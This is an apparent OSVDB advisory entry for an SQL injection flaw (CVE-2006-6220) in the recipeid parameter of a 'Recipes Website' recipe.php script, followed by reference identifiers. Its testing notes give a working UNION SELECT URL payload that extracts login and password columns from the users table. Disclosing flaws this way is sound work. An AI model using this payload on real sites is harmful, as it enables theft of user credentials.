Recipes Website recipe.php recipeid Variable SQL Injection

2006-11-23T05:33:52
ID OSVDB:30678
Type osvdb
Reporter OSVDB
Modified 2006-11-23T05:33:52

Description

Manual Testing Notes

http://[target]/[path]/recipe.php?recipeid=-1%20UNION%20SELECT%20login,password,0,0,0,0%20FROM%20users%20/*

References:

Vendor URL: http://www.easysitenetwork.com/modules.php?name=Content&pa=showpage&pid=2
Secunia Advisory ID: 23083
Related OSVDB ID: 30679
ISS X-Force ID: 30509
Generic Exploit URL: http://www.milw0rm.com/exploits/2834
FrSIRT Advisory: ADV-2006-4686
CVE-2006-6220
Bugtraq ID: 21270